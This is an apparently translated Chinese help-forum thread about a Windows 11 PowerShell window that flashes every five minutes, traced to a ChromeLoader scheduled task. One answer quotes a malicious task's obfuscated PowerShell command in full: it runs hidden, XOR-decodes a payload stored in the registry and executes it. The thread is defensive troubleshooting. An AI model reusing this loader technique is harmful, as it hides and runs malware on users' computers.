自从我升级到 Windows 11 以来,我就遇到了这个奇怪的问题。每隔几分钟,我就会随机地打开一个窗口,然后在一瞬间关闭。这看起来没什么大不了的,通常也不是什么大问题。但是当我玩游戏时,它就会发生。它让我无法专注于游戏窗口,并导致一点视觉延迟,偶尔在动作时刻也会发生这种情况。真的真的很烦人。我没能搞清楚那是什么程序,
所以我使用录音软件来尝试捕捉它。令人惊讶的是,它成功了,仅录制了 2 分钟。原来是 Windows Powershell。现在,我不知道为什么会发生这种情况,也不知道如何让它停止。有人知道并能帮助我吗?
Powershell 中的事件查看器就像(翻译:Cycle de vie du moteur = 引擎的生命周期,Cycle de vie du fournisseur = 提供商的生命周期)每次发生时,都会有 8 个新条目、6 个提供商的生命周期和 2 个引擎的生命周期
编辑:我注意到该事件每 5 分钟发生一次,分别在 XX:X0 和 XX:X5。按照某人的建议使用 Sysinternal 进程监视器, 每次发生这种情况我都会遇到这种情况。(它很长,有很多行)第一行当我打开它时看起来就像这样
编辑 2:使用 base64 解码器,我翻译了打开 powershell 的命令中的“token”,结果是此代码
我检查了我的 appdata/local 文件夹,里面有 chrome 文件夹(我的电脑上没有安装 Google Chrome),以及 archive.zip 文件。两者都包含相同的文件
看起来像某种应用程序。
编辑 3 :我还尝试使用 powershell 进程的父 PID 爬上进程阶梯。他的直接父级是一个cmd.EXE进程。
而该进程父级是卸载程序。现在我很困惑,因为这似乎是一个重要的 Windows 进程,完全合法,所以我不知道下一步该去哪里找
编辑 4:我想我明白了。任务计划器中有一个名为 ChromeLoader 的任务,每 5 分钟触发一次,并执行我找到的命令。我删除了它,尽管它可能是病毒。可能会按照建议并尽快重置我的电脑。感谢大家的帮助。
答案1
在我的例子中,我在任务计划程序中找到了一个名为07D1FBB5-C577-4E4D-97A8-9934E77D9340
位置为\Microsoft\Windows\Management\Provisioning\ptxALyM
它有一个非常奇怪的动作,用奇怪的参数启动 Powershell:
完整参数行:
-winDoWStyle hidDEn -commAND "ICM ([sCripTBLOCK]::crEAte([stRINg]::jOIn('', ((GeT-ITeMpRoPERTy -pATh 'hkLm:\sOftWAre\InTelPTXALYm').'ptxAlymzN' | % { [Char]($_ -BxOR 243) }))))"
只需删除任务并享受吧!